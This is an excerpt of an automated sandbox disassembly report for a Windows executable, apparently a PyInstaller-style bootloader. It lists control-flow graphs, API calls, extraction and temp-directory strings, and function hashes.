                                                                                                                                                                                                                                          control_flow_graph 536 7ff67aef69d4-7ff67aef6a47 call 7ff67aef6708 539 7ff67aef6a61-7ff67aef6a6b call 7ff67aee8590 536->539 540 7ff67aef6a49-7ff67aef6a52 call 7ff67aee4f58 536->540 546 7ff67aef6a6d-7ff67aef6a84 call 7ff67aee4f58 call 7ff67aee4f78 539->546 547 7ff67aef6a86-7ff67aef6aef CreateFileW 539->547 545 7ff67aef6a55-7ff67aef6a5c call 7ff67aee4f78 540->545 559 7ff67aef6da2-7ff67aef6dc2 545->559 546->545 550 7ff67aef6af1-7ff67aef6af7 547->550 551 7ff67aef6b6c-7ff67aef6b77 GetFileType 547->551 556 7ff67aef6b39-7ff67aef6b67 GetLastError call 7ff67aee4eec 550->556 557 7ff67aef6af9-7ff67aef6afd 550->557 553 7ff67aef6bca-7ff67aef6bd1 551->553 554 7ff67aef6b79-7ff67aef6bb4 GetLastError call 7ff67aee4eec CloseHandle 551->554 562 7ff67aef6bd3-7ff67aef6bd7 553->562 563 7ff67aef6bd9-7ff67aef6bdc 553->563 554->545 570 7ff67aef6bba-7ff67aef6bc5 call 7ff67aee4f78 554->570 556->545 557->556 564 7ff67aef6aff-7ff67aef6b37 CreateFileW 557->564 568 7ff67aef6be2-7ff67aef6c37 call 7ff67aee84a8 562->568 563->568 569 7ff67aef6bde 563->569 564->551 564->556 574 7ff67aef6c39-7ff67aef6c45 call 7ff67aef6910 568->574 575 7ff67aef6c56-7ff67aef6c87 call 7ff67aef6488 568->575 569->568 570->545 574->575 581 7ff67aef6c47 574->581 582 7ff67aef6c8d-7ff67aef6ccf 575->582 583 7ff67aef6c89-7ff67aef6c8b 575->583 584 7ff67aef6c49-7ff67aef6c51 call 7ff67aeeab30 581->584 585 7ff67aef6cf1-7ff67aef6cfc 582->585 586 7ff67aef6cd1-7ff67aef6cd5 582->586 583->584 584->559 587 7ff67aef6d02-7ff67aef6d06 585->587 588 7ff67aef6da0 585->588 586->585 590 7ff67aef6cd7-7ff67aef6cec 586->590 587->588 591 7ff67aef6d0c-7ff67aef6d51 CloseHandle CreateFileW 587->591 588->559 590->585 593 7ff67aef6d53-7ff67aef6d81 GetLastError call 7ff67aee4eec call 7ff67aee86d0 591->593 594 7ff67aef6d86-7ff67aef6d9b 591->594 593->594 594->588
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                          • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                          • Instruction ID: 9775d139d67edc4f97f44dc2b06c4b49005f967b52a26ff5bcff6be1e530c7ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1D037B38A8286EB50EFA4D4902AC3761FB49B98B015279DE6E973E4CF38D411D700
                                                                                                                                                                                                                                          Function 00007FF67AED83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED841B
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED849E
                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84BD
                                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84CB
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84DC
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNELBASE(?,00007FF67AED8B09,00007FF67AED3FA5), ref: 00007FF67AED84E5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                          • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                          • Instruction ID: d3a2438e11d2ca88eb340adb5ca6ecbc3b6e3c88ee57efbd3099f17788b74922
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9241B233A2CA4285EE60BB20E4541B96760FBD4B95FA002B6D59DC36E4DF3CE54ADB00
                                                                                                                                                                                                                                          Function 00007FF67AED92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                                          • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                          • Instruction ID: d28ffa42b0d84b46a6519afa3a2c2f60d18f75212e6962a0310a220fa363a27b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF06863A3874186FBA09F60B8497667350EBC8764F140775EAAD42BE4DF3CD049DA00
                                                                                                                                                                                                                                          Function 00007FF67AEF0938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1010374628-0
                                                                                                                                                                                                                                          • Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                          • Instruction ID: 8d9acf8f07449fd11f2eae8f49686f131d102f6b57a441ca05788a938152af3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30029223B3E64681FA95BB15B8012792790EF45BA0F8585B9DD5DC73F1FE3DA801A700
                                                                                                                                                                                                                                          Function 00007FF67AED1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 329 7ff67aed1950-7ff67aed198b call 7ff67aed45b0 332 7ff67aed1c4e-7ff67aed1c72 call 7ff67aedc5c0 329->332 333 7ff67aed1991-7ff67aed19d1 call 7ff67aed7f80 329->333 338 7ff67aed1c3b-7ff67aed1c3e call 7ff67aee00bc 333->338 339 7ff67aed19d7-7ff67aed19e7 call 7ff67aee0744 333->339 343 7ff67aed1c43-7ff67aed1c4b 338->343 344 7ff67aed1a08-7ff67aed1a24 call 7ff67aee040c 339->344 345 7ff67aed19e9-7ff67aed1a03 call 7ff67aee4f78 call 7ff67aed2910 339->345 343->332 350 7ff67aed1a45-7ff67aed1a5a call 7ff67aee4f98 344->350 351 7ff67aed1a26-7ff67aed1a40 call 7ff67aee4f78 call 7ff67aed2910 344->351 345->338 359 7ff67aed1a7b-7ff67aed1afc call 7ff67aed1c80 * 2 call 7ff67aee0744 350->359 360 7ff67aed1a5c-7ff67aed1a76 call 7ff67aee4f78 call 7ff67aed2910 350->360 351->338 371 7ff67aed1b01-7ff67aed1b14 call 7ff67aee4fb4 359->371 360->338 374 7ff67aed1b35-7ff67aed1b4e call 7ff67aee040c 371->374 375 7ff67aed1b16-7ff67aed1b30 call 7ff67aee4f78 call 7ff67aed2910 371->375 380 7ff67aed1b6f-7ff67aed1b8b call 7ff67aee0180 374->380 381 7ff67aed1b50-7ff67aed1b6a call 7ff67aee4f78 call 7ff67aed2910 374->381 375->338 389 7ff67aed1b9e-7ff67aed1bac 380->389 390 7ff67aed1b8d-7ff67aed1b99 call 7ff67aed2710 380->390 381->338 389->338 393 7ff67aed1bb2-7ff67aed1bb9 389->393 390->338 395 7ff67aed1bc1-7ff67aed1bc7 393->395 396 7ff67aed1be0-7ff67aed1bef 395->396 397 7ff67aed1bc9-7ff67aed1bd6 395->397 396->396 398 7ff67aed1bf1-7ff67aed1bfa 396->398 397->398 399 7ff67aed1c0f 398->399 400 7ff67aed1bfc-7ff67aed1bff 398->400 402 7ff67aed1c11-7ff67aed1c24 399->402 400->399 401 7ff67aed1c01-7ff67aed1c04 400->401 401->399 403 7ff67aed1c06-7ff67aed1c09 401->403 404 7ff67aed1c2d-7ff67aed1c39 402->404 405 7ff67aed1c26 402->405 403->399 406 7ff67aed1c0b-7ff67aed1c0d 403->406 404->338 404->395 405->404 406->402
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED7F80: _fread_nolock.LIBCMT ref: 00007FF67AED802A
                                                                                                                                                                                                                                          • _fread_nolock.LIBCMT ref: 00007FF67AED1A1B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF67AED1B6A), ref: 00007FF67AED295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                          • Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                          • Instruction ID: b2a02993556ecdc16b705cf08276494c7cbd6882b58917f26097cdbe1aa66f93
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50819573A2CA8685E764FB24E0402FD23A1EF84784F5444B5E98DC77A5DE3CE585EB40
                                                                                                                                                                                                                                          Function 00007FF67AED1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 407 7ff67aed1600-7ff67aed1611 408 7ff67aed1613-7ff67aed161c call 7ff67aed1050 407->408 409 7ff67aed1637-7ff67aed1651 call 7ff67aed45b0 407->409 416 7ff67aed162e-7ff67aed1636 408->416 417 7ff67aed161e-7ff67aed1629 call 7ff67aed2710 408->417 414 7ff67aed1682-7ff67aed169c call 7ff67aed45b0 409->414 415 7ff67aed1653-7ff67aed1681 call 7ff67aee4f78 call 7ff67aed2910 409->415 424 7ff67aed169e-7ff67aed16b3 call 7ff67aed2710 414->424 425 7ff67aed16b8-7ff67aed16cf call 7ff67aee0744 414->425 417->416 431 7ff67aed1821-7ff67aed1824 call 7ff67aee00bc 424->431 432 7ff67aed16d1-7ff67aed16f4 call 7ff67aee4f78 call 7ff67aed2910 425->432 433 7ff67aed16f9-7ff67aed16fd 425->433 441 7ff67aed1829-7ff67aed183b 431->441 446 7ff67aed1819-7ff67aed181c call 7ff67aee00bc 432->446 434 7ff67aed16ff-7ff67aed170b call 7ff67aed1210 433->434 435 7ff67aed1717-7ff67aed1737 call 7ff67aee4fb4 433->435 443 7ff67aed1710-7ff67aed1712 434->443 447 7ff67aed1761-7ff67aed176c 435->447 448 7ff67aed1739-7ff67aed175c call 7ff67aee4f78 call 7ff67aed2910 435->448 443->446 446->431 449 7ff67aed1802-7ff67aed180a call 7ff67aee4fa0 447->449 450 7ff67aed1772-7ff67aed1777 447->450 460 7ff67aed180f-7ff67aed1814 448->460 449->460 453 7ff67aed1780-7ff67aed17a2 call 7ff67aee040c 450->453 462 7ff67aed17a4-7ff67aed17bc call 7ff67aee0b4c 453->462 463 7ff67aed17da-7ff67aed17e6 call 7ff67aee4f78 453->463 460->446 468 7ff67aed17c5-7ff67aed17d8 call 7ff67aee4f78 462->468 469 7ff67aed17be-7ff67aed17c1 462->469 470 7ff67aed17ed-7ff67aed17f8 call 7ff67aed2910 463->470 468->470 469->453 472 7ff67aed17c3 469->472 475 7ff67aed17fd 470->475 472->475 475->449
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                          • Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                                          • Instruction ID: b82633df46db8a370f212e31aa0b0f4ae4a1dbc6fea42a64e576e19e8bbe3e97
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E519D63F2864382EA10BB21A4001B963A0FF84B94F6445B5EE5C877F6EF3CE545E740
                                                                                                                                                                                                                                          Function 00007FF67AED8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(?,?,00000000,00007FF67AED3CBB), ref: 00007FF67AED88F4
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00007FF67AED3CBB), ref: 00007FF67AED88FA
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00007FF67AED3CBB), ref: 00007FF67AED893C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED8A20: GetEnvironmentVariableW.KERNEL32(00007FF67AED388E), ref: 00007FF67AED8A57
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF67AED8A79
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEE82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEE82C1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2810: MessageBoxW.USER32 ref: 00007FF67AED28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                          • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                          • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                          • Instruction ID: 3f1f4f8e84d84a6d251df56c8224f56326eb2d7cfc222d389400b8b8eef994a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1141BE23A3D68244FA60BB25A8512BA2390AFC8B84F9441B1ED4DD77F6DE3CE501F700
                                                                                                                                                                                                                                          Function 00007FF67AED1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 599 7ff67aed1210-7ff67aed126d call 7ff67aedbdf0 602 7ff67aed126f-7ff67aed1296 call 7ff67aed2710 599->602 603 7ff67aed1297-7ff67aed12af call 7ff67aee4fb4 599->603 608 7ff67aed12d4-7ff67aed12e4 call 7ff67aee4fb4 603->608 609 7ff67aed12b1-7ff67aed12cf call 7ff67aee4f78 call 7ff67aed2910 603->609 615 7ff67aed12e6-7ff67aed1304 call 7ff67aee4f78 call 7ff67aed2910 608->615 616 7ff67aed1309-7ff67aed131b 608->616 621 7ff67aed1439-7ff67aed144e call 7ff67aedbad0 call 7ff67aee4fa0 * 2 609->621 615->621 617 7ff67aed1320-7ff67aed1345 call 7ff67aee040c 616->617 627 7ff67aed1431 617->627 628 7ff67aed134b-7ff67aed1355 call 7ff67aee0180 617->628 636 7ff67aed1453-7ff67aed146d 621->636 627->621 628->627 635 7ff67aed135b-7ff67aed1367 628->635 637 7ff67aed1370-7ff67aed1398 call 7ff67aeda230 635->637 640 7ff67aed139a-7ff67aed139d 637->640 641 7ff67aed1416-7ff67aed142c call 7ff67aed2710 637->641 642 7ff67aed139f-7ff67aed13a9 640->642 643 7ff67aed1411 640->643 641->627 645 7ff67aed13d4-7ff67aed13d7 642->645 646 7ff67aed13ab-7ff67aed13b9 call 7ff67aee0b4c 642->646 643->641 647 7ff67aed13ea-7ff67aed13ef 645->647 648 7ff67aed13d9-7ff67aed13e7 call 7ff67aef9ea0 645->648 652 7ff67aed13be-7ff67aed13c1 646->652 647->637 651 7ff67aed13f5-7ff67aed13f8 647->651 648->647 656 7ff67aed13fa-7ff67aed13fd 651->656 657 7ff67aed140c-7ff67aed140f 651->657 653 7ff67aed13c3-7ff67aed13cd call 7ff67aee0180 652->653 654 7ff67aed13cf-7ff67aed13d2 652->654 653->647 653->654 654->641 656->641 659 7ff67aed13ff-7ff67aed1407 656->659 657->627 659->617
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                          • Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                                          • Instruction ID: 1ec7006b102bf207a0378e5772f1d5a93109ec49e5ea2f35d8cc00beffea3e4f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7651D023A2C68285EA60BB22A4003BE6691FF85B94FA44175ED4DC77E5EF3CE541E700
                                                                                                                                                                                                                                          Function 00007FF67AEEED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF67AEEF11A,?,?,-00000018,00007FF67AEEADC3,?,?,?,00007FF67AEEACBA,?,?,?,00007FF67AEE5FAE), ref: 00007FF67AEEEEFC
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF67AEEF11A,?,?,-00000018,00007FF67AEEADC3,?,?,?,00007FF67AEEACBA,?,?,?,00007FF67AEE5FAE), ref: 00007FF67AEEEF08
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
